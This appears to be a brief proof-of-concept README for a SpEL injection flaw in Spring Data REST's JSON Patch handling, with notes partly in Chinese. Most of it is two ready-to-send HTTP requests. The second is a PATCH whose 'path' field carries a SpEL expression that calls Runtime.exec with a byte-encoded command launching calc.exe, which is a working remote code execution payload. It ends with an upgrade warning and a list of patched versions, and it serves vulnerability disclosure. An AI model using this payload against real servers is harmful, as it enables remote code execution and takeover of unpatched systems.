please UPGRADE spring data rest NOW.
-
启动本应用
-
创建test instance
POST /entityPersons/ HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache
{
"firstName":"f2"
}
- 利用spel注入, 会启动C:\Windows\system32\calc.exe
PATCH /entityPersons/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json-patch+json
Cache-Control: no-cache
[
{
"op":"test",
"path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[] {67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 115, 121, 115, 116, 101, 109, 51, 50, 92, 99, 97, 108, 99, 46, 101, 120, 101} ))",
"value":""
}
]- Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
- Spring Boot 2.0.0.M4
- Spring Data release train Kay-RC3
spring boot 1.5.7.RELEASE uses spring data rest 2.6.7, but 1.4.x is not upgrade spring data rest version.